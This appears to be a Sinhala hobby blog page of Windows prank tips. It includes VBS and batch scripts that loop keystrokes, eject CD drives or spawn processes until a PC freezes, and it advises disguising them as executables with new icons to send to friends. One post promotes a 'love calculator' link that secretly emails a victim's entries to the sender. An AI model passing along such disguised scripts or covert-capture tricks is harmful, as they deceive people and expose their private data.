හතර වරං හැකිං

සිංහලෙන් Tips Tricks & Hacks කියල මුලින් ආපු අපි ඔන්න අලුත් මුහුනුවරකින්..

අපේ ආරක්ෂාව

මොනව කරන්නත් කලින් අපි ආරක්ෂා වෙලා ඉන්න එපැයි.

මොකක්ද මේ Ethical Hacking

Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks

පරිඝණක වෛරස්

Types of Computer Viruses, Infection Strategies, Antivirus Defense Development.

පොඩි පොඩි software කෑලි

අපිට හදිස්සියට වගෙම නිතර නිතර ඕනෙ වෙන software කෑලි නොමිලේම ගන්න.

The Technical Avenue

මේක තමයි අපේ ඉංගිරීසි අඩවිය. ගිහින්ම බලන්න.

Pages

හොඳ හෝ නරක comment එකක් දාල යන්න අමතක කරන්න එපා.. :)
Showing posts with label Fun. Show all posts
Showing posts with label Fun. Show all posts

Thursday, September 6, 2012

යාලුවගෙ keyboard එක පිස්සු වට්ටමුද?



ඔන්න හතර වරං පලවෙනි post එක අරන් ආව. දිග post එකකට එන්න එක පාරට කම්මැලී වගේ. පොඩි fun post එකකින් පටන් ගම්මු.

මෙන්න මෙහෙමයි වැඩේ.





 1. Notepad එකක් දිග ඇරගෙන පහල තියෙන code එක ඒකෙ copy paste කරගන්න.


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are FOOL"
loop


2. දැන් File -> Save as ගිහින් මේක ඔයා කැමති නමක් දීල .VBS extension එකෙන් save කරගන්න. උදා: anyname.vbs

3. දැන් ඉතින් ඕක යාලුවට යවන්න. යවන්න කලින් ඔයාට ඕක executable file එකකට wrap කරල icon එක change කරල යවන්න පුලුවන්නම් වඩාත් සාර්ථකයි. ඒ ටික කරන හැටි ඉස්සරහට වෙන ලිපියකින් කියන්නම්. දැනට ඔහොම යවන්න.

යාලුව ඕක run කරපු ගමන් mouse pointer එක තියෙන හැම text area එකකම අපි දෙන "You Are FOOL" කියන message එක type වෙනව automatically. ඔයාට මේ message එක ඔයාට කැමති විදිහකට වෙනස් කරගන්න පුලුවන්.

හරි. ඔයාට ඕනෙම නම් මේක test කරල බලන්නත් පුලුවන්. හැබැයි වෙන වැදගත් වැඩක් කර කර හිටියනම් ඒව save කරගෙන close කරගෙන ඉන්න test කරන්න කලින්. ඊට පස්සෙ මේක run කරල බලන්න.

කොහොමද ඉතින් මේක නවත්තන්නෙ?

නවත්තන්න නම් ඔයා Windows Task Manager එක open කරගන්න. Windows Task Manager එක open කරගන්න Ctrl+Shift+Esc keys එකවර press කරන්න. ඊටපස්සෙ Process tab එකට යන්න. එතනින් wscript.exe කියන process එක select කරල right click කරල එන menu එකෙන් End Process select කරන්න.

ඔය විදිහට නවත්ත ගන්න අමාරු නම් තව option එකක් තියෙනව. ඒ තමයි පරිඝණකය restart කරන එක.

ජය වේවා. යාලුවගෙන් ගුටි කන ඒවට මම නෑ ඕං.

Friday, November 19, 2010

පුලුවන් නම් හදන්න "con" කියල folder එකක්


ඔයාල folder එකක් හදල "con" කියල rename කරන්න බලන්න. පුලුවන්ද..?
ඇත්තටම එහෙම කරන්න බෑ. ඒ විතරක් නෙමෙයි, ඔයාලට “con”, “prn”, “nul” , “com1″ “com2″, “lpt1″ වගේ නම් එකකින් වත් folders හදන්න බෑ. (හදන්න බෑ කිවුවට හදන හැටි පෙන්නන්නම්)

ඇයි හදන්න බැරි..?
ඔයාල ඒ නමකින් folder එකක් හදන්න යද්දි Win XP වල නම් ඒක automatically NewFolder කියලයි save වෙන්නෙ. win Vista/7 නම් error msg එකක් එයි “The specified device name is invalid” කියල.

ඒකට හේතුව ඔය නම් වලින් internal devices represent කරනව.
උදා:
CON -CONsole
PRN -PRiNter
NUL - NULL
COM1 to COM9 - COMmunication ports
LPT1 to LPT9 - Line PrinTer ports

ඒ හේතුවෙන් ඒ නමින් folders හදන්න දෙන්නෙ නෑ.

මම කලින් කිවුවනෙ බෑ කිවුවට හදන විදිහත් කියල දෙනව කියල. හදන්න ඕනෙම නම් හදන්නෙ මෙහෙමයි.

1. Command Prompt එක ගන්න.
2. මේ විදිහට type කරන්න.
ඔයාට D drive එකේ con කියල folder එකක් හදන්න ඕනෙයි කියල හිතන්න..
එහෙනම් මේ විදිහට type කරන්න.

C:\>md \\.\d:\con

(මේ විදිහට ඔයාට d වෙනුවට කැමති drive letter එකක් දීල "con" වෙනුවට “prn”, “nul”, “com1″, “com2″, “lpt1″ වගේ කැමති නමක් දීල folder එක හදා ගන්න පුලුවන්.)

මේ හදාගත්ත එක delete කරන්නෙ කොහොමද. නිකන් shift+delete ගහල delete වෙනවද බලන්න.
එහෙම කරන්න බෑ.
delete කරන්නත් command prompt එක use කරන්න වෙනව.
command prompt එක අරන් මෙහෙම type කරන්න.

C:\>rd \\.\e:\con

GoodLuck

Thursday, June 3, 2010

පුංචි පහේ spam බෝම්බයක් හදාගන්න ඕනෙද..?


ඔන්න ආයෙත් notepad එකක් ගන්න.
පහලින් තියෙන code එක ඒකෙ type කරගන්න;









@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer


ඔය code එකේ start කියල තියෙන ඒව ඕනෙ තරම් copy paste කරගන්න. ඒව වැඩි වෙන තරමට තමයි හොඳ..

උදා:

@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer

දැන් Save as ගිහින් ඕක කැමති නමකින් හැබැයි අන්තිමට .bat කියල(අපි හදාගන්නෙ batch command file එකක් නිසා) rename කරල save කරන්න.

එච්චරයි.. දැන් අපේ පුන්චි apam bomb එක ලෑස්තියි.

මේකෙදි වෙන්නෙ මේකයි. කවුරු හරි ඔය batch file එක run කරපු ගමන් අපි code එකේ start කියල ලියල තියෙන හැම එකක්ම open වෙන්න ගන්නව.
උදා: start iexplore.exe වලින් වෙන්නෙ internet explorer එක open වෙන එක.
ඉතින් හිතන්න මේ code එක සිය පාරක් නැත්නම් ඊට වැඩි උපරිම ප්‍රමාණයක් copy paste කලොත් computer එක stuck වෙන්න උනත් පුලුවන්.

ඔයාට මේක වැඩ කරනවද බලන්න ඕනෙනම් code එක වැඩි ප්‍රමාණයක් copy paste කරන්නෙ නැතුව run කරල බලන්න. ඕක run කලාට හානියක් නෑ.

ඕක ඉතින් පොඩි පහේ ආතල් එකක් ගන්න මිසක් කිසි හානියක් කරන්නෙ නෑ.. වැඩිම වුනොත් මන් කලින් කියපු විදිහට statrt command වැඩි කලොත් computer එක stuck කරන්න පුලුවන් වෙයි..

යාලුව හොරෙන් ආදරේ කරන්නෙ කාටද කියල හොයාගන්න ඕනෙද..??


මේ මම කියන්න යන්නෙ පට්ට ආතල් website එකක් ගැන.. ඔයාගෙ යාලුව ඔයාටත් නොකිය හොරෙන් ආදරේ කරන්නෙ කාටද කියල හොයාගන්න පුලුවන් පට්ට site එකක්.

ඔයාට තියෙන්නෙ මේ site එකට ගිහින් >> CLICK HERE TO GET STARTED IN 2 MINUTES << කියන එක click කරන්න.
එතකොට ඔයාගෙ විස්තර පුරවන්න පොඩි form කෑල්ලක් එනව.
මේ විස්තර පුරවල ඉවර වෙලා ඔයා "Create Link" කියල තියෙන button එක click කරන්න.

එතකොට ඒගොල්ලො ඔයාට link එකක් දෙනව.

දැන් වැඩේ ලෑස්තියි.
ඔයාට ඕනෙ නම් ඒ link එකට ගිහින් බලන්න. ඒකෙ තියෙන්නෙ love calculator එකක්. හැබැයි වැඩේ කියන්නෙ මෙතන type කරන හැම නමක්ම ඔයා register වෙද්දි දුන්න email එකට mail එකක් විදිහට send කරනව.
ඔයාට ඕනෙනම් test පාරක් දාලම ඉන්න.

දැන් තේරෙනවනෙ ඊටපස්සෙ කරන්න ඕනෙ වැඩේ..
ඔයාට කරන්න තියෙන්නෙ පට්ට love calculator එකක් තියෙනව කියල යාලුවට යවන එකයි. යාලුව ඕකෙ විස්තරේ type කරල "Click to find out" button එක click කරපු හැටියෙ ඔයාගෙ mail එකට බඩු එනව.

හරියටම තේරුනෙ නැත්නම් site එකට ගිහින්ම බලන්න. එකෙ විස්තර ඇතුව කියල තියෙනව.

මෙන්න link එක; http://www.crushbits.com/

(site එකේම කියල තියෙනව ඔයාට ඕනෙ නම් ඔයාගෙ ආදරවන්තයට මේක යවල එයාගෙ හොර අල්ලන්නත් පුලුවන් කියල... හික් හික්.. හැබැයි පවුල් කඩාකප්පල් වෙන ඒවට මම වග කියනු නොලැබේ..)

Sunday, May 30, 2010

ඔයාගෙ desktop එකට එහෙමෙහෙ දුවන පූස් පැටවු ටිකක්..


මේක මං ලඟ තියෙන ලස්සන පොඩි desktop application එකක්. ඔයාගෙ desktop එකට එහෙමෙහෙ දුවන පූස් පැටවු ටිකක් දාගන්න.. ඔයාට කැමති තරමක් දාගන්න පුලුවන්.. මෙතනින් download කරගන්න..

Wednesday, May 26, 2010

Notepad එකෙන් Matrix Effect එකක්..


1. මුලින්ම Notepad එකක් open කරගෙන පහලින් තියෙන code එක copy paste කර ගන්න..







@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


2. දැන් ඒක Save as ගිහින් matrix.bat කියල නම දීල save කරගන්න..

3. දැන් save වුන file එක double click කරල open කරගන්න..

MatRiX effeCt

ඔයා type කරන එක ඔයාගෙ computer එකෙන් කියවගන්න පොඩි code එකක්..





1. Notepad එකක් open කරගන්න.
2. පහල code එක notepad එකට copy paste කරගන්න.





Dim userInput

userInput = InputBox("Write a message for me to say")

Set Sapi = Wscript.CreateObject("SAPI.SpVoice")

Sapi.speak userInput


3. දැන් ඒක Save as ගිහින් කැමති නමකින් save කරගන්න. හැබැයි නම අගට .VBS කියල තියෙන්න ඕනෙ.
Eg: talk.vbs

4. දැන් create වෙච්ච .vbs file එක double click කරල open කරගන්න.
5. දැන් එකෙ ඔයාලට ඕනෙ දෙයක් type කරල OK කරන්න.
දැන් ඔයාගෙ computer එක කතා කරයි....

ඔයාගෙ USB Pen එක හැඩ කරගන්ඩ කැමතිද ??


1. මුලින්ම ඔයා මේ link එකෙන් Apple.ico icon එක download කරගන්න..

(ඔයා ලග වෙන හොද icons තියෙනව නම් ඒව උනත් use කරන්න පුලුවන්..)

2. දැන් download කරගත්තු icon එක pen එකට copy paste කරන්න.
ඊට පස්සෙ එක Right click කරල Properties වලට ගිහින් hide කරගන්න.

3. දැන් Notepad එකක් open කරල පහල code එක copy paste කරගන්න.


[autorun]

icon = Apple.ico

label = Your Name


4. Code එකේ Your Name කියල තියෙන තැනට ඔයගෙ නම දාගන්න.

5. දැන් Save as ගිහින් autorun.inf කියල නම් කරල pen එක ඇතුලෙ save කරගන්න.

6. එච්චරයි.., දැන් Pen එක ගලවල ආයෙ ගහල බලන්න..
ලස්සන icon එකක් එක්ක ඔයගෙ නම තියෙයි.

Saturday, April 17, 2010

Fun virus 2ක් හදමු..

1. Notepad එකක් open කරගන්න.
2. පහල තියෙන code එක copy කරල Notepad එකට paste කරන්න:









Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >=1 then
do
For i=0 to colCDROMs.COunt -1
colCDROMs.Item(i).Eject
Next ' cdrom
For i=0 to colCDROMs.COunt -1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


3. දැන් ඔය Notepad එක save as ගිහින් disco.vbs කියල save කරන්න.
(කැමති නමකින් save කරගන්ඩ පුලුවන්. ඒත් .vbs අන්තිමට එන්න ඕනෙ..)

4. දැන් හැදෙන .vbs file එක double click කරල බලන්න..
කොහොමඩ වැඩ..

* CD Rom එක Auto open වෙන එක නවත්තන්න TASK MANAGER එක open කරල(ctrl+alt+del), ඒකෙ "Processes" tab එක click කරන්න.
ඒකෙ තියෙන list එකෙන් "WSCRIPT.EXE" කියල තියෙන file එක හොයල select කරල Delete කරන්න.

[02]. Key board එක පිස්සු නටන virus එකක් හදමු.. ;)

ඉස්සෙල්ල එක වගේමයි..

1. Notepad එකක් open කරගන්න.2. පහල තියෙන code එක copy කරල Notepad එකට paste කරන්න:


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


3. දැන් ඔය Notepad එක save as ගිහින් disco2.vbs කියල save කරන්න.
(කැමති නමකින් save කරගන්ඩ පුලුවන්. ඒත් .vbs අන්තිමට එන්න ඕනෙ..)

4. දැන් හැදෙන .vbs file එක double click කරල බලන්න..

දැන් keyboard එක පිස්සු නටන හැටි බලන්න වෙන notepad එකක් අරන් මොනව හරි type කරල බලන්න..

ඕක නවත්තන්නෙත් ඉස්සෙල්ල විදිහටමයි..

ඔයාලගෙ Internet Explorer එකේ title bar එකට ඔයාලගෙ නම දාගන්න කැමතිද ?


1. ඔයාල මුලින්ම ඔයාලගෙ key board එකේ "windows" key එකයි "R" key එකයි එකට press කරල (Win+R), Run dialogue box එක ගන්න.

2. දැන් ඒකෙ regedit කියල type කරල Enter කරන්න.

3. දැන් එනව Registry Editor එක.

4. ඒකෙන් මේ පියවර අනුගමනය කරමින් එකින් එක යන්න:
HKEY_CURRENT_USER -> Software -> Microsoft -> Internet Explorer -> Main

5. දැන් දකුණු පැත්තෙ pannel එකේ මුකුත් නැති space එකක right click කරල, New -> String Value select කරන්න.
දැන් හැදුනු file එක Window Title කියල Rename කරගන්න.

(**බැරි වෙලාවත් Window Title කියල file එකක් හදන්න කලින් තිබ්බොත් කෙලින්ම 6 වෙනි පියවරට යන්න..)

6. දැන් ඒ file එක උඩ double click කරල Value Data කියල තියෙන තැනට ඔයාගෙ නම type කරල OK කරන්න.

7. එච්චරයි.. දැන් computer එක restart කරල Internet Explorer open කරල title bar එක බලන්න. ඔයගෙ නම තියෙයි.